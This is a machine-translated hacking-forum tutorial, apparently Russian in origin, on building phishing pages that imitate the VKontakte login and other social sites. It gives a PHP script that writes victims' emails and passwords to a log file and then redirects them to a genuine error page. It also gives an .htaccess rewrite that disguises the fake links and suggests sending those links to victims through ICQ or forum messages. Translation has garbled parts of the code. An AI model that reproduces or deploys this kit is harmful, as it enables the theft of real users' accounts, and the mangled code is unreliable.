This page has been robot translated, sorry for typos if any. Original content here.

Faux à la hâte

[iNtrO]

En fait, mon premier article (le premier sur l'anti-chat) m'a permis de comprendre le fait que, dans la section achat / vente / échange / lancer, il existe un sujet dans lequel un démon a vendu autant de faux 10 vmz, et souvent invité à créer l'un ou l'autre faux ...
Je vais vous dire dans un article comment obtenir un faux universel presque sous tout ce qui est usé! Je vais montrer sur l'exemple de faux vkontakte.

[SeaRchINg]

Et donc, la première chose dont nous avons besoin est de choisir une ressource pour les victimes et de rassembler toutes les informations dont nous avons besoin, et nous n'avons besoin que d'une copie de certaines pages. Nous allons à vkontakte.ru via Operu (!) . Nous appuyons sur le bouton de saisie, allons à login.php et le prenons comme notre faux index. Nous appuyons sur l'opéra: Fichier -> Enregistrer sous -> Dans la boîte de dialogue ouverte sous le nom que nous avons sélectionné (par défaut, il existe Web Archive ....) " Fichier HTML avec images ", nous écrivons dans l' index de la colonne Nom du fichier (ou login.htm - selon la page)


Ensuite, saisissez-y des données irréalistes et accédez à la page sur laquelle elles sont écrites.
Cette adresse email n'est pas enregistrée ou le mot de passe est incorrect.
Nous le conservons de la même manière, alors au lieu d'index, nous écrivons mal .
Ensuite, nous conduisons la phrase Vkontakte.ru sur Google.ru, cliquez sur les résultats supplémentaires de vkontakte.ru ” et cherchez quelque chose en rapport avec le contact eror ... Sur la deuxième page, j'ai trouvé VKontakte | Erreur (http://vkontakte.ru/blank.php?code=10)- rappelez-vous, nous avons besoin de ce lien
Utilisez, nous avons déjà tout ce dont nous avons besoin pour des faux dans une ressource.

[CoDiNg]

Taxe, nous examinons maintenant le formulaire de connexion. Ouvrez notre fichier index.html et recherchez le formulaire de connexion.
 <form method = "post" name = "login" id = "login" action = "login.php">

  <input type = "hidden" name = "success_url" id = "success_url" value = "">
  <input type = "hidden" name = "fail_url" id = "fail_url" value = "">

  <input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1">
  <table align = "center" cellpadding = 0 cellpacing = 7 border = 0 width = "40%">

  <tr>
  <td width = "100px">
  <span class = "grey"> E-mail: </ span>
  </ td>
  <td>

  <input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />

  <td>
  </ tr>
  <tr>
  <td>
  <span class = "grey"> Mot de passe: </ span>

  </ td>
  <td>
  <input class = "inputText" type = "mot de passe" name = "pass" value = "" id = "pass" size = "25" />

  </ td>
  </ tr>
 
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>

  <input style = "margin-top: 1px; vertical-align: middle;"  type = "case à cocher" name = "expire" id = "expire" value = "1" /> <small> Ordinateur extraterrestre </ small>

  </ td>
  </ tr>
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>
De là, nous nous souvenons de 3 choses:
<form method = "post" name = "login" id = "login" action = "login.php">
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "mot de passe" name = " pass " value = "" id = "pass" size = "25" />
C’est dans ces 3 choses que réside la première partie de l’unicité, sur n’importe quel réseau social, courrier électronique ou ailleurs, partout où le formulaire de saisie (champs) ressemblera à ceci (enfin, le nom des champs s’éveille), par exemple, les camarades de classe ont
<input id = "field_password" value = "" style = "width: 170px;" type = "mot de passe" size = "20" name = " st.password ">
Par exemple, le nom des champs est simplement différent, les éléments de la conception, mais la fonction est la même pour tout le monde.
Maintenant, nous créons un fichier php et l'appelons par exemple login.php , son contenu:

Code PHP:
  <? php
 

/ *
##############
# by_NoNameZ #
############
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri +) @ (( 0 0a-z- ++ ..) + + 0a-a-zy2,4.4 ( 2) i " , $ _POST [ " email " ]) &&! vide ( $ _POST [ " mot de passe " ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'password' ]. "\ n" );
en-tête ( "Emplacement: http: //" );
} else {
en-tête ( "Emplacement: http: //" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
En fait, nous examinons le script, quelques parchemins, mais il s’agit d’un faux normal, sa fonctionnalité:
Sauvegarde des variables transmises, leur vérification, redirige en fonction de la vérification.

Et ainsi, revenons maintenant à ces 3 lignes:
<form method = "post" name = "login" id = "login" action = " login.php ">
Ici, nous avons tout en ordre, le nom de notre script coïncide avec le nom de leur script, mais il ne coïncide pas, puis nous le remplaçons ou nous le renommons.
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "mot de passe" name = "pass" value = "" id = "pass" size = "25" />
De là, nous avons besoin de name = " email " et name = " pass "
Collez-les dans notre script au bon endroit.
  <? php
 

/ *
##############
# by_NoNameZ #
############
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri +) @ (( 0 0a-z- ++ ..) + + 0a-a-zy2,4.4 ( 2) i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'pass' ]. "\ n" );
en-tête ( "Emplacement: http: //" );
} else {
en-tête ( "Emplacement: http: //" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
Celui qui n'a pas remarqué est $ _POST ['email'] et $ _POST ['pass']

Ensuite, nous examinons le craquement, ici la fonction IF ELSE est définie, et pregmatch, c’est-à-dire que si le champ e-mail correspond à l’e-mail (nick@mylo.ru, et non tel que piloté), et le champ mot de passe n’est pas vide, la première redirection est exécutée, si le courrier électronique ne correspond pas ou le champ de passage est vide, puis la deuxième redirection. Il s’ensuit que si Chel a introduit du savon et quelque chose de similaire à un laissez-passer, nous l’avons jeté sur la page avec eror http://vkontakte.ru/blank.php?code=10 , et s’il est entré avec des ordures (ici il nous fallait copie de la page bad.html? lorsque nous avons entré des données incorrectes), nous les renvoyons ensuite, c’est-à-dire que nous avons entré bad.htm.

Code PHP:
  <? php
 

/ *
##############
# by_NoNameZ #
############
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri +) @ (( 0 0a-z- ++ ..) + + 0a-a-zy2,4.4 ( 2) i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'pass' ]. "\ n" );
en-tête ( "Emplacement: http://vkontakte.ru/blank.php?code=10" );
} else {
en-tête ( "Location: bad.htm" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
Nous économisons. Nous remplissons toute la merde sur le serveur (login.php, index.htm + dossier avec les fichiers, bad.htm + dossier avec les fichiers), créons le fichier log.txt (je vous conseille de choisir votre nom unique. N'oubliez pas de modifier le script), configurez-le lui chmod777.

3) une petite mise à jour ...

Cette mise à jour est très appropriée pour SI. À la racine du FTP, nous créons un fichier .htaccess avec le contenu suivant:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -F
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ATTENTION !!!
! index \ .htm - fait référence à cette redirection de fichier, si vous avez un faux, disons login.html. alors, en conséquence, vous devez renommer l’index en login.

Taxe, ce fichier nous donne un lien plus qualitatif gazliv, à savoir:
Votre fak.ru / n'importe quel texte, en connaissant la structure de liens du faux sogda, par exemple un contact, nous pouvons le faire:


votre fiction.ru / photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
et vparit sur ICQ))) d'accord. moins visible maintenant faux))

C'est tout

[La fin] En fait, ce qui est unique, et le fait que vous puissiez aller à vos camarades de classe, également enregistrer la page, entrer des variables, remplacer les URL (je donne immédiatement http://odnoklassniki.ru/dk?st.cmd=error) et c'est tout, absolument allez à mayil.ru, sauvegardez les variables et remplacez tout;))) La seule chose dont vous pourriez avoir besoin est la créativité, nous ne sauverons pas la page principale, mais la page de connexion. Vous pouvez également créer n'importe quel forum si vous souhaitez obtenir un compte ( envoyer à pm
<a href="feik"> lien vers le sujet </a>
, et dans le faux, spécifiez ce sujet pour la redirection.